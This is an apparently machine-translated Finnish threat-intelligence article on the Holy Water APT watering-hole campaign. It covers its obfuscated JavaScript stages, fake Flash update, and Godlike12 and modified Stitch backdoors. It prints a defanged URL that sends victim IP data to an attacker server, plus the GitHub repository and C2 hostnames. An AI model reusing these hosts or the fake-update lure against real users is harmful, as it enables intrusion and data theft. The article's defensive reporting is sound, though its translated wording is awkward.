Pyhä vesi APT

Holy Water APT on nimi kyberrikollisten ryhmälle, joka suoritti sarjan vesireikätyyppisiä hyökkäyksiä aasialaista uskonnollista ja etnistä ryhmää vastaan. Tämän hyökkäyksen TTP:tä (Tactics, Techniques and Procedures) ei voitu lukea minkään jo tunnetun ATP-toimijan (Advanced Persistent Threat) ansioksi, mikä sai tutkijat päättelemään, että kyseessä on uusi kyberrikollisryhmä, jolla on pieni ja joustava hakkeriryhmä.

Suorittaakseen vesireikähyökkäyksen rikolliset kohdistavat useita verkkosivustoja, joilla nimetyt kohteet vierailevat usein. Sivustot voivat kuulua kohderyhmään kuuluville organisaatioille, hyväntekeväisyysjärjestöille tai vaikutusvaltaisille henkilöille. Kaikki Holy Waterin vaarantamat verkkosivustot isännöivät samalla palvelimella, ja ne sisälsivät muun muassa uskonnollisen persoonallisuuden, hyväntekeväisyyden, vapaaehtoispalveluohjelman ja reilun kaupan järjestön.

Hyökkäys sisälsi useita vaiheita

Vieraillessaan vaarantuneella verkkosivustolla käyttäjä siirtyy ensimmäiseen hyökkäysvaiheeseen, joka koostuu vioittuneesta JavaScriptistä, jonka nimi on (script|jquery)-css.js ja joka on hämärtynyt kiinalaisella verkkopalvelulla Sojson. Tämän skriptin tehtävänä on määrittää, onko käyttäjä kelvollinen kohde ja tehdä niin hyötykuorma alkaa kaapata vierailijan tietoja ja lähettää ne ulkoiselle palvelimelle osoitteessa loginwebmailnic.dynssl[.]com HTTP GET -pyyntöjen kautta:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

Palvelimen vastaus palauttaa oikean tai epätosi tuloksen, ja jos arvo on tosi, hyökkäyksen seuraava vaihe käynnistyy. muuten ei tapahdu mitään.

Toisessa vaiheessa JavaScript-niminen (script|jquery)-file.js, joka on jälleen kerran hämärtää samalla tavalla. Tällä kertaa hakkerit käyttivät kuitenkin Sojson v5:tä v4:n sijaan. Holy Water APT ei hyödynnä mitään ohjelmiston haavoittuvuuksia tai heikkouksia käyttäjän tartuttamiseen. Sen sijaan luodaan ponnahdusikkuna, joka tarjoaa Flash Player -päivityksen ja mahdollisen uhrin on suostuttava tiedoston lataamiseen.

Holy Water APT:n haittaohjelmien arsenaalia isännöi GitHub

Jos käyttäjä sallii väärennetyn Flash-päivityksen edetä, se muodostaa yhteyden ei-aktiiviseen GitHub-tietovarastoon, joka sijaitsee osoitteessa github.com/AdobeFlash32/FlashUpdate . Tähän paikkaan oli tallennettu neljä erilaista työkalusarjaa - asennuspaketti, tutkijoiden Godlike12 nimeämä takaoven haittaohjelma ja kaksi versiota avoimen lähdekoodin Python-takaovesta, joka tunnetaan nimellä Stitch , joita hakkerit muuttivat laajennetulla toiminnallisuudella. Päivityspaketti on NSIS-asennusohjelma, joka poistaa laillisen Windows Flash Player -asennusohjelman ja vaihetyökalu, jota käytetään todellisen hyötykuorman lataamiseen. Godlike12-takaovi on kirjoitettu Go-kielellä ja sitä käytetään toteuttamaan Google Drive -kanava Command and Control (C&C, C2) palvelimille. Mitä tulee Stitch-takaoviversioihin, tavanomaisten takaoven toimintojen, kuten tietojen ja salasanan keräämisen, toimintojen kirjaamisen, tiedostojen lataamisen jne., lisäksi Holy Water -ryhmä lisäsi mahdollisuuden ladata laillinen Adobe Flash -asennusohjelma automaattista päivitystä varten. itsensä osoitteesta ubntrooters.serveuser.com ja saavuttaa pysyvyys hyödyntämällä ajoitettuja tehtäviä.